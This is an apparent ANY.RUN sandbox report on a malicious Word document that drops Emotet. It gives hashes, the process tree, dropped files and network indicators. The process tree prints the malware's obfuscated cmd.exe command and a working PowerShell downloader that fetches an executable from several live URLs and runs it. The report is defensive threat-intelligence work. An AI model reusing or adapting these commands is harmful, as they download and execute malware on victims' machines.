download: | cBhoO |
Full analysis: | https://app.any.run/tasks/50e28893-3a19-4052-8d70-b4617d684cff |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it was upgraded into very destructive malware. It targets mostly corporate victims, but private users also get infected through mass spam email campaigns. |
Analysis date: | November 14, 2018, 11:39:32 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Colin, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 06:29:00 2018, Last Saved Time/Date: Wed Nov 14 06:29:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | 050EE0A338BC0A9D319BD6F0BD100575 |
SHA1: | 241D7C428E9FDEE8278959CCB40B40A5DAAA467B |
SHA256: | 7AB984982B1B020D54E198116505AB1AAFEE30323C6FA41D6E71D53B8796B802 |
SSDEEP: | 1536:vJK+lhLocn1kp59gxBK85fBt+a9Rjduedt9+d5paxyNs:vJbla41k/W487jduedt9+d5paxyW |
Extension | | | Detected type |
---|---|---|---|
.doc | | | Microsoft Word document (54.2) |
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Colin |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:11:14 06:29:00 |
ModifyDate: | 2018:11:14 06:29:00 |
Pages: | 1 |
Words: | 2 |
Characters: | 13 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 14 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2564 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\cBhoO.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2252 | cmd /V^:^O/C"^se^t M^y=)^Z^W^$YNG^uz^i^E^sJ^SB^p^Oc^4e^x^}@^\at^[/^o^w^Q^L^IP]^jF(^g^l5r^ynq^T^k^0m^-'^2b.U^:^,^1^f^d^ ^{^h;v=^M^+&&^f^or %^2 ^in (15,^2^8,^29,^19^,4^1,^1^1,6^2,^19,^39^,^3^9^,60,^3^,7^,^11^,6^2,^65^,^50^,8,^9^,1,50,63^,3,4^,31,^8^,^6^5^,^50^,^6^2,^25,2^5,^15^,^55,^2^7^,^2^7,^59,^7^,62^,^2^8,1^7,3^8,25^,1^7,^5^3,1^7^,^2^8^,^4^8,27^,3^9,4^4,25^,^15,2^2,62,^2^5,2^5^,15,^55^,27^,27,^52,19^,1^1^,^2^5^,25,4^1^,^2^4^,^64^,19,^39,11,^53^,3^9^,^9^,^64,19,^2^7^,4^0,^1^5^,5^4^,^2^2^,6^2,2^5^,^25,^15^,55,^27,^2^7,^1^1,^24^,^9^,^1^1^,^9^,59^,5^9^,62,53,1^7^,2^8^,4^8^,^2^7,4,2^8^,^2,1^,^59,^18,^2^2,^6^2,^25,^2^5^,15,^55,^27^,2^7,9,4^3,^11,7,4^8,1^9,^2^0^,53,17,2^8,^4^8,^53^,^4^8^,^20^,2^7,8^,4^5^,66^,5^9^,^5^1^,22,^62,^2^5,2^5^,^1^5,^5^5,^2^7,^27^,3^8^,9,^24^,4^3,^38,4^3^,38^,^7^,42^,^1^9^,^4^3^,^41,19^,^2^4,^39^,53^,^1^7,28^,4^8,2^7,^45^,50,^53,1^3,1^5^,3^9^,^9,^25,^3^7,^50^,22,50^,0,^6^3^,^3^,^3^5^,^48^,^64^,65,^37,^26,13^,4^2,1^1,2^5^,1^9,^4^8,^5^3^,^3^2^,^1^6^,^5^3^,33^,24^,2^5,^6^2^,^34^,55,^55,6,1^9^,2^5,^4^5,^1^9^,^4^8,^1^5^,^33^,2^4,25,^6^2^,^37^,0^,^67,5^0,2^3^,^12,^30,9,5^3^,^19^,2^0,^1^9,50,^0^,^6^3^,3,36,46,^30,^6^0,^65^,^5^,^1^9,^29,^4^9,^1^6,^52,3^5^,^1^9,^17^,^2^5,60^,4^9^,^1^7^,^2^8^,^48,60,50^,^4^8^,^1^1,^20^,4^8^,^39,51,5^3,20,48^,^3^9^,6^2,25,25^,^1^5,^50,^6^3^,^3^,^1,^4^6^,4^8,60^,^6^5^,^6^0,^5^,^1^9^,29,4^9,16,^5^2,^35,19^,1^7^,^25,^60^,49^,^1^7^,^28^,^4^8^,6^0,^5^0^,^2^4^,5^9^,^2^8,^5^9,5^2^,5^3^,11^,25,^4^1,^19,^2^4,4^8^,^50,63,^58^,^2^8^,^4^1,19^,^2^4^,^1^7,^6^2^,^37,3,3^5^,^2^8^,44^,60,9,^4^3,60^,^3,^4,31,^8,0,61^,25,^41^,^4^2^,^61,3^,^3^6,^4^6,30^,^5^3^,^2^8,15,^19,4^3^,^3^7,50,^6,^1^0,45^,50^,^5^6,^3^,3^5,28,^4^4^,^5^6,^4^7,0,6^3^,^3,3^6,46,3^0^,53,11^,19,43,59^,^3^7,0,6^3^,^3^,1^,^46,^48^,^53,28^,1^5^,19^,^43,^3^7,0^,6^3,^3,1,46^,^4^8,^5^3,^25^,42,^1^5^,^1^9,^60^,65,^6^0^,^57^,6^3^,^3^,^1^,46^,48^,53,29^,4^1^,^9^,25^,19,37^,^3,^3^6^,4^6^,3^0,^53^,^4^1,19^,1^1,1^5^,^28,4^3,11^,^1^9,14,^2^8,59^,^42,0,63,^3,1,4^6,4^8^,^5^3^,1^1,24^
,6^4,19^,25^,^28^,^58,9,^3^9,^1^9^,3^7^,3,35,^4^8^,64,0,^63,^1^3,^25^,2^4^,4^1,25,49^,^33^,4^1,^2^8^,1^7^,1^9^,11^,1^1,60,^3^,^3^5^,^4^8^,6^4^,^6^3^,52,41,1^9,2^4,46^,^2^1,^17,2^4,^2^5^,^1^7,^6^2,^6^1^,2^1,21,60^,^60^,^60^,6^0,60^,60^,6^0^,60,60,^60^,60^,6^0^,6^0,60,^60,6^0^,^60,69)^do ^s^et ^B^1=!^B^1!!M^y:~%^2,1!&&^if %^2=^=^69 c^a^l^l %^B^1:*^B1!^=%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3368 | powershell $ush='ziZ';$YLz='http://duhocgtc.com/lqtp@http://besttravels.live/5pU@http://saisiddh.com/YoWZd4@http://insumex.com.mx/zTMd2@http://giangnguyenreal.com/T'.Split('@');$jmv=([System.IO.Path]::GetTempPath()+'\JQi.exe');$FkQ =New-Object -com 'msxml2.xmlhttp';$Zkm = New-Object -com 'adodb.stream';foreach($joq in $YLz){try{$FkQ.open('GET',$joq,0);$FkQ.send();$Zkm.open();$Zkm.type = 1;$Zkm.write($FkQ.responseBody);$Zkm.savetofile($jmv);Start-Process $jmv;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1264 | "C:\Users\admin\AppData\Local\Temp\JQi.exe" | C:\Users\admin\AppData\Local\Temp\JQi.exe | — | powershell.exe |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
3448 | "C:\Users\admin\AppData\Local\Temp\JQi.exe" | C:\Users\admin\AppData\Local\Temp\JQi.exe | | JQi.exe |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
2216 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | | JQi.exe |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
4068 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | | lpiograd.exe |
User: admin Company: Micro Integrity Level: MEDIUM Version: 6.1.7600.1 | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
2564 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9B80.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3368 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5HZI8TMJ41ZXJ7KWBMCY.temp | — | |
MD5:— | SHA256:— | |||
3448 | JQi.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:937E7DF7B3830852B5C89666F182F1F7 | SHA256:B453E2189C74D790D64C349169DAE27113263DB74233F05F327B642637E442BF | |||
3368 | powershell.exe | C:\Users\admin\AppData\Local\Temp\JQi.exe | executable | |
MD5:937E7DF7B3830852B5C89666F182F1F7 | SHA256:B453E2189C74D790D64C349169DAE27113263DB74233F05F327B642637E442BF | |||
2564 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$cBhoO.doc | pgc | |
MD5:1E001FBFF8775286ECD0C380FEE9262F | SHA256:CBE1C26E21B1BCCE233643C39CEEDD120222B9CA8B8F55744620536BEB92C0F8 | |||
3368 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
3368 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da90d.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
2564 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:BEFEA26C8A4DCFEA564F9EFCEC5865C3 | SHA256:551EF632D788BA0FCDF95710A48389315FAA34AA7E3EA2025359AA97F0F7FB4D |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4068 | lpiograd.exe | GET | — | 83.110.100.209:443 | http://83.110.100.209:443/ | AE | — | — | malicious |
3368 | powershell.exe | GET | 200 | 103.81.85.177:80 | http://duhocgtc.com/lqtp/ | VN | executable | 448 Kb | malicious |
3368 | powershell.exe | GET | 301 | 103.81.85.177:80 | http://duhocgtc.com/lqtp | VN | html | 672 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3368 | powershell.exe | 103.81.85.177:80 | duhocgtc.com | The Corporation for Financing & Promoting Technology | VN | suspicious |
4068 | lpiograd.exe | 83.110.100.209:443 | — | Emirates Telecommunications Corporation | AE | malicious |
Domain | IP | Reputation |
---|---|---|
duhocgtc.com | | malicious |
PID | Process | Class | Message |
---|---|---|---|
3368 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3368 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
3368 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |